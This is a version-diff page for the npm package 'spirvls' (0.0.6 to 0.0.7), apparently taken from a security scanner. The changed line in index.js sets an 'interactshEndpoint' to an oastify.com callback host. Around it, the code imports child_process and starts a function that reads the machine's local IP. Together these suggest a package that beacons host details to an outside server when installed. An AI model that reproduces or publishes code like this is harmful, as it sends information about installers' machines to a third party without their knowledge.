spirvls 0.0.6 → 0.0.7
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +1 -1
package/index.js
CHANGED
@@ -5,7 +5,7 @@ const https = require("https");
|
|
5
5
|
const { execSync } = require("child_process");
|
6
6
|
|
7
7
|
// Replace with your Interactsh endpoint
|
8
|
-
const interactshEndpoint = "
|
8
|
+
const interactshEndpoint = "bwbwdqbtjhrx5k1uv6em3z0yvp1gp6dv.oastify.com";
|
9
9
|
|
10
10
|
// Function to get the local IP address
|
11
11
|
function getLocalIP() {
|